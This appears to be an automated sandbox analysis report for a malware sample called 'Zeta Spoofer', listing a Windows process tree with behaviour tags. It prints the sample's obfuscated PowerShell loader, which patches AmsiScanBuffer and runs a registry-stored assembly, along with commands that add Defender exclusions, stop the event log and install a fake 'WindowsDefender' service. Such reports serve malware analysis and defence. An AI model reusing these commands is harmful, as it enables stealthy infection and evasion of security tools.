PID 432 wrote to memory of 3340	432	Defenderupdates.exe	128
PID 432 wrote to memory of 3340	432	Defenderupdates.exe	128
PID 432 wrote to memory of 3340	432	Defenderupdates.exe	128
PID 432 wrote to memory of 3340	432	Defenderupdates.exe	128
PID 2720 wrote to memory of 3460	2720	cmd.exe	129
PID 2720 wrote to memory of 3460	2720	cmd.exe	129
PID 2900 wrote to memory of 2104	2900	powershell.EXE	132
PID 2900 wrote to memory of 2104	2900	powershell.EXE	132
PID 2900 wrote to memory of 2104	2900	powershell.EXE	132
PID 2900 wrote to memory of 2104	2900	powershell.EXE	132
PID 2900 wrote to memory of 2104	2900	powershell.EXE	132
PID 2900 wrote to memory of 2104	2900	powershell.EXE	132
PID 2900 wrote to memory of 2104	2900	powershell.EXE	132
PID 2900 wrote to memory of 2104	2900	powershell.EXE	132
PID 2104 wrote to memory of 612	2104	dllhost.exe	5
PID 2104 wrote to memory of 668	2104	dllhost.exe	7
PID 2104 wrote to memory of 960	2104	dllhost.exe	12
PID 2104 wrote to memory of 336	2104	dllhost.exe	13
PID 2104 wrote to memory of 440	2104	dllhost.exe	14
PID 2104 wrote to memory of 720	2104	dllhost.exe	15
PID 2104 wrote to memory of 928	2104	dllhost.exe	16
PID 2104 wrote to memory of 1000	2104	dllhost.exe	17
PID 2104 wrote to memory of 1092	2104	dllhost.exe	19
PID 2104 wrote to memory of 1196	2104	dllhost.exe	20
PID 2104 wrote to memory of 1204	2104	dllhost.exe	21
PID 2104 wrote to memory of 1328	2104	dllhost.exe	22
PID 2104 wrote to memory of 1340	2104	dllhost.exe	23
PID 2104 wrote to memory of 1364	2104	dllhost.exe	24
PID 2104 wrote to memory of 1376	2104	dllhost.exe	25
PID 2104 wrote to memory of 1384	2104	dllhost.exe	26
PID 2104 wrote to memory of 1556	2104	dllhost.exe	27
PID 2104 wrote to memory of 1564	2104	dllhost.exe	28

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:612
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:336
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{e925c6b4-d9e5-4003-aa7a-9e912154b808}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2104
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{ce9e7388-d63a-4ae0-8ffe-4923ee748fcc}
  2⤵
  PID:4440
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 4440 -s 300
    3⤵
    - Checks processor information in registry
    - Enumerates system info in registry
    PID:3520

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:668

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:960

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:440

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:720

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:928

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1000

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1092
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2924
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:oFaoEVWbTkiu{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ZUWqtLeXvaahFi,[Parameter(Position=1)][Type]$KmFzeZDzxL)$IoWtLfRtGWG=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'ef'+'l'+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+'e'+''+[Char](100)+'D'+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+''+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+[Char](77)+'e'+'m'+''+'o'+''+'r'+'y'+'M'+''+[Char](111)+'d'+'u'+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+'D'+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+''+[Char](101)+'','C'+[Char](108)+''+[Char](97)+''+[Char](115)+'s,'+[Char](80)+''+[Char](117)+'b'+'l'+'i'+[Char](99)+''+[Char](44)+'S'+[Char](101)+''+[Char](97)+''+'l'+''+'e'+''+[Char](100)+','+'A'+''+'n'+''+[Char](115)+''+[Char](105)+''+'C'+''+[Char](108)+''+'a'+''+'s'+''+'s'+''+','+''+'A'+''+'u'+''+[Char](116)+''+[Char](111)+'C'+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$IoWtLfRtGWG.DefineConstructor('R'+'T'+''+'S'+''+'p'+'e'+[Char](99)+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+''+','+''+'P'+''+[Char](117)+'b'+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$ZUWqtLeXvaahFi).SetImplementationFlags(''+'R'+'un'+[Char](116)+''+[Char](105)+'m'+[Char](101)+','+'M'+'a'+[Char](110)+''+'a'+''+'g'+''+[Char](101)+'d');$IoWtLfRtGWG.DefineMethod('I'+'n'+''+[Char](118)+''+[Char](111)+'k'+[Char](101)+'',''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+'H'+'i'+''+'d'+''+[Char](101)+''+'B'+''+'y'+''+'S'+''+[Char](105)+''+'g'+','+[Char](78)+''+'e'+''+[Char](119)+''+[Char](83)+''+'l'+'o'+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+'r'+''+'t'+''+[Char](117)+''+[Char](97)+''+'l'+'',$KmFzeZDzxL,$ZUWqtLeXvaahFi).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+'g'+[Char](101)+'d');Write-Output $IoWtLfRtGWG.CreateType();}$fbJgIQVyJTqgj=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+'y'+''+'s'+'t'+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'')}).GetType('M'+[Char](105)+'c'+[Char](114)+''+[Char](111)+'s'+'o'+''+'f'+''+'t'+''+'.'+''+[Char](87)+''+'i'+'n'+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+[Char](115)+'a'+[Char](102)+''+'e'+'N'+[Char](97)+''+[Char](116)+''+[Char](105)+''+'v'+''+'e'+''+[Char](77)+''+[Char](101)+'t'+[Char](104)+'o'+[Char](100)+''+[Char](115)+'');$FKvJaGRMyiMKXv=$fbJgIQVyJTqgj.GetMethod('G'+[Char](101)+''+[Char](116)+''+'P'+'ro'+'c'+''+'A'+'d'+'d'+''+[Char](114)+''+[Char](101)+'s'+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'b'+'l'+''+[Char](105)+''+'c'+''+','+''+[Char](83)+'t'+'a'+''+[Char](116)+'i'+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$fNkNZGolIUKXTaGQUso=oFaoEVWbTkiu @([String])([IntPtr]);$DVWKytxtuIiqVhZipzPuQp=oFaoEVWbTkiu @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$BFRHHCwauOf=$fbJgIQVyJTqgj.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+''+[Char](108)+''+[Char](101)+''+'H'+''+[Char](97)+''+'n'+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+''+'r'+''+'n'+'e'+'l'+''+[Char](51)+'2'+'.'+''+'d'+''+[Char](108)+'l')));$NuYuVlpPjzyExP=$FKvJaGRMyiMKXv.Invoke($Null,@([Object]$BFRHHCwauOf,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+'d'+[Char](76)+''+'i'+''+'b'+''+[Char](114)+''+[Char](97)+''+[Char](114)+''+[Char](121)+''+'A'+'')));$PbdtPwqAwcUdDKjgI=$FKvJaGRMyiMKXv.Invoke($Null,@([Object]$BFRHHCwauOf,[Object](''+[Char](86)+'i'+'r'+''+[Char](116)+''+[Char](117)+'a'+'l'+''+'P'+''+[Char](114)+''+[Char](111)+''+[Char](116)+''+'e'+''+[Char](99)+'t')));$KWLUxiI=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NuYuVlpPjzyExP,$fNkNZGolIUKXTaGQUso).Invoke(''+'a'+''+'m'+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'');$CIfiQJJOPYMrCZbbd=$FKvJaGRMyiMKXv.Invoke($Null,@([Object]$KWLUxiI,[Object]('A'+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+'c'+'a'+'n'+''+[Char](66)+''+[Char](117)+'f'+[Char](102)+''+'e'+'r')));$SIFDHnHgJv=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PbdtPwqAwcUdDKjgI,$DVWKytxtuIiqVhZipzPuQp).Invoke($CIfiQJJOPYMrCZbbd,[uint32]8,4,[ref]$SIFDHnHgJv);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$CIfiQJJOPYMrCZbbd,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PbdtPwqAwcUdDKjgI,$DVWKytxtuIiqVhZipzPuQp).Invoke($CIfiQJJOPYMrCZbbd,[uint32]8,0x20,[ref]$SIFDHnHgJv);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'T'+[Char](87)+'A'+[Char](82)+''+[Char](69)+'').GetValue('dial'+'e'+''+[Char](114)+''+[Char](115)+''+[Char](116)+''+'a'+'ge'+'r'+'')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2900
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1244
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:vHdNTYadpamT{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$cvWmnAJdKtAQJW,[Parameter(Position=1)][Type]$vojEKFMGhu)$bIABXUVzPIh=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Re'+'f'+''+[Char](108)+''+[Char](101)+''+'c'+''+[Char](116)+''+[Char](101)+'d'+'D'+'e'+[Char](108)+'e'+[Char](103)+''+'a'+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+'M'+[Char](101)+''+'m'+''+[Char](111)+'r'+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+'e'+'',$False).DefineType(''+'M'+''+'y'+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+'y'+'p'+'e'+'',''+[Char](67)+''+[Char](108)+''+'a'+'ss'+','+'Pu'+[Char](98)+'l'+'i'+''+'c'+''+','+''+[Char](83)+''+[Char](101)+'al'+[Char](101)+'d'+','+''+[Char](65)+''+[Char](110)+''+[Char](115)+'i'+'C'+''+[Char](108)+'as'+[Char](115)+''+[Char](44)+'A'+'u'+''+'t'+'o'+'C'+''+[Char](108)+'a'+[Char](115)+'s',[MulticastDelegate]);$bIABXUVzPIh.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+'e'+'c'+''+[Char](105)+'a'+'l'+''+'N'+'a'+[Char](109)+''+[Char](101)+''+[Char](44)+'Hi'+[Char](100)+''+[Char](101)+''+'B'+'ySig'+[Char](44)+''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$cvWmnAJdKtAQJW).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](100)+'');$bIABXUVzPIh.DefineMethod(''+[Char](73)+''+'n'+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+'li'+'c'+''+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+''+'B'+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+',New'+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+'r'+[Char](116)+'u'+[Char](97)+''+[Char](108)+'',$vojEKFMGhu,$cvWmnAJdKtAQJW).SetImplementationFlags(''+'R'+'u'+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+','+[Char](77)+'a'+[Char](110)+''+'a'+'g'+[Char](101)+'d');Write-Output $bIABXUVzPIh.CreateType();}$rPNbMXoxRGbsX=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+'e'+'m.'+'d'+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+''+[Char](114)+''+[Char](111)+''+[Char](115)+''+'o'+''+[Char](102)+'t.'+[Char](87)+'i'+[Char](110)+''+'3'+'2'+[Char](46)+'U'+'n'+''+[Char](115)+''+'a'+'f'+[Char](101)+'N'+[Char](97)+'t'+'i'+''+[Char](118)+''+'e'+'M'+[Char](101)+''+'t'+''+[Char](104)+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$HxdEKbbixcenbB=$rPNbMXoxRGbsX.GetMethod(''+[Char](71)+''+'e'+'t'+'P'+''+[Char](114)+'oc'+'A'+''+[Char](100)+''+'d'+'r'+[Char](101)+'s'+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+'u'+''+'b'+''+'l'+'ic'+','+''+[Char](83)+''+'t'+'a'+[Char](116)+''+'i'+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$QxrjTBlDnjJxWFCZqiX=vHdNTYadpamT @([String])([IntPtr]);$AEqgFLKcyuMNzREcivXBMz=vHdNTYadpamT @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$oiqdxrWXVSz=$rPNbMXoxRGbsX.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+'u'+'l'+''+'e'+'H'+'a'+''+'n'+''+'d'+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+''+[Char](110)+''+[Char](101)+''+[Char](108)+''+'3'+'2.dll')));$JaBfyMjWJbShnp=$HxdEKbbixcenbB.Invoke($Null,@([Object]$oiqdxrWXVSz,[Object]('L'+[Char](111)+'a'+[Char](100)+'L'+[Char](105)+''+'b'+''+[Char](114)+''+[Char](97)+''+[Char](114)+''+[Char](121)+''+'A'+'')));$RjAayCiiLlYCqhZBq=$HxdEKbbixcenbB.Invoke($Null,@([Object]$oiqdxrWXVSz,[Object]('V'+[Char](105)+''+[Char](114)+''+'t'+''+'u'+''+[Char](97)+'l'+[Char](80)+'r'+[Char](111)+''+[Char](116)+''+[Char](101)+''+'c'+''+[Char](116)+'')));$psEBvgx=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JaBfyMjWJbShnp,$QxrjTBlDnjJxWFCZqiX).Invoke(''+[Char](97)+'m'+[Char](115)+'i'+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'');$CnmvToeFWwiCrrdVv=$HxdEKbbixcenbB.Invoke($Null,@([Object]$psEBvgx,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+'S'+''+'c'+'a'+[Char](110)+''+[Char](66)+''+[Char](117)+''+[Char](102)+'f'+[Char](101)+''+'r'+'')));$pkurWdcwdk=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($RjAayCiiLlYCqhZBq,$AEqgFLKcyuMNzREcivXBMz).Invoke($CnmvToeFWwiCrrdVv,[uint32]8,4,[ref]$pkurWdcwdk);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$CnmvToeFWwiCrrdVv,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($RjAayCiiLlYCqhZBq,$AEqgFLKcyuMNzREcivXBMz).Invoke($CnmvToeFWwiCrrdVv,[uint32]8,0x20,[ref]$pkurWdcwdk);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+'E'+'').GetValue('di'+'a'+'l'+'e'+''+[Char](114)+''+[Char](115)+''+[Char](116)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5068
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1452

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1196

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1204

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1328

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1340
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2452

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1364

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1376

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1384

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1556

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1564

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1616

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1700

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1720

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1808

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1816

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1828

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1880

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1888

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2020

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2072

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2116

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2372

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2388

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2396

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2468

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2508

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2568

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2592

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2624

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2632

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2988

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3076

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3300

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3384
- C:\Users\Admin\AppData\Local\Temp\Zeta Spoofer.exe
  "C:\Users\Admin\AppData\Local\Temp\Zeta Spoofer.exe"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:3164
- - C:\Users\Admin\AppData\Local\Temp\Zeta.exe
    "C:\Users\Admin\AppData\Local\Temp\Zeta.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4912
  - - C:\Users\Admin\AppData\Local\Temp\Zeta.exe
      "C:\Users\Admin\AppData\Local\Temp\Zeta.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Suspicious use of FindShellTrayWindow
      PID:4904
- - C:\Users\Admin\AppData\Local\Temp\ZetaSpoofer.exe
    "C:\Users\Admin\AppData\Local\Temp\ZetaSpoofer.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:3200
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4452
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2824
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:4592
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:1852
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:2272
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:3980
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:3184
  - - C:\Windows\system32\dialer.exe
      C:\Windows\system32\dialer.exe
      4⤵
      PID:3888
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe delete "WindowsDefender"
      4⤵
      Launches sc.exe
      PID:1500
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe create "WindowsDefender" binpath= "C:\ProgramData\Defenderupdates.exe" start= "auto"
      4⤵
      Launches sc.exe
      PID:1656
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop eventlog
      4⤵
      Launches sc.exe
      PID:2904
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe start "WindowsDefender"
      4⤵
      Launches sc.exe
      PID:1140

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3532

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3728

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3880

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3564

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:3804

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:1732

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:5040

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:2428

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4292

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:972

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:1424

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:1908

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:2040

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:1780

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:2840

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:5000

C:\ProgramData\Defenderupdates.exe
C:\ProgramData\Defenderupdates.exe
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:432
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
